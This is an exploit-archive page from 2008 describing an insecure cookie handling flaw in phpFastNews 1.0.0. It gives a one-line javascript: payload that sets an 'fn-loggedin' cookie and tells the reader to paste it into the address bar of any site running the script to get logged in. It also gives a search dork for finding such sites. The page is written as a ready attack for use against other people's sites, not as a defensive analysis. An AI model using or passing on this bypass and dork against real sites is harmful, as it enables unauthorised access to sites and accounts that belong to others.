[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : phpFastNews 1.0.0 Insecure Cookie Handling Vulnerability
# Published : 2008-10-18
# Author : Qabandi
# Previous Title : XOOPS Module GesGaleri (kategorino) Remote SQL Injection Exploit
# Next Title : zeeproperty (adid) Remote SQL Injection Vulnerability


#################################################
##	Qabandi 	iqa[at]hotmail.fr      ##
##		from Kuwait		       ##
#################################################
\	phpFastNews
//	 Insecure cookie handling
\
//   Go to any website that has the script installed
\	type the following code into the Adress Bar
//
\	javascript:document.cookie = "fn-loggedin = 1";
//
\	Refresh do whatever, and you will be logged in
//
\		Dork:intext:"Powered by phpFastNews"
#################################################
##	Greetz: Killer Hack, Str0ke	       ##
#################################################
		PEACE

# www.Syue.com [2008-10-18]